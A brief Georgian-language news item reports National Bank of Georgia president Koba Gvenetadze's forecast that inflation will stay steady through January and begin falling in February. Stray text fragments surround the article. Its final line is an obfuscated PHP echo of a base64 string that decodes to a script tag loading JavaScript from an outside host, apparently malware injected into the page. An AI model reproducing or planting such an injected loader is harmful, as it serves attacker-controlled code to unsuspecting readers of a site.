celsiusi
ავერსი საქკაბელი
ჩვენი მოლოდინი არის, რომ სხვა თანაბარ პირობებში ინფლაცია დაახლოებით იგივე დონეზე შენარჩუნდება, რაც ახლა გვაქვს, იანვრის ჩათვლოთ და შესამჩნევი კლება უკვე უნდა იყოს თებერვლის თვეში, – ამის შესახებ საქართველოს ეროვნული ბანკის პრეზიდენტმა, კობა გვენეტაძემ განაცხადა.
 
როგორც კობა გვენეტაძემ აღნიშნა, ამის წინაპირობები და განმაპირობებელი ფაქტორები არის ის, რომ მონეტარული პოლიტიკა გამკაცრებული ნარჩუნდება.
 
„ჩვენ ასევე მივიღეთ მაკროპოტენციული ზომები. ვხედავთ, რომ მსოფლიოს სასაქონლო ბაზრებზე არის კლება ინდექსების და ეს აუცილებლად უნდა აისახოს საქართველოში, ამავე დროს, ლარის გაცვლითი კურსი არის მყარი, რომელსაც ასევე თავისი პირობები აქვს. მოგეხსენებათ, რომ ტურიზმის აღდგება საკმაოდ სწრაფად მოხდა, ამავე დროს მიგრანტების შემოსვლამაც ეს გავლენა იქონია. ვფიქრობ, ეს გარემოებები განაპირობებს იმას, რომ თებერვლიდან დაიწყება ინფლაციის შემცირება სხვა თანაბარ პირობებში და მიზნობრივ მაჩვენებელთან დაახლოება წლის მეორე ნახევარში უნდა მოხდეს“, – განაცხადა გვენეტაძემ.
795
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");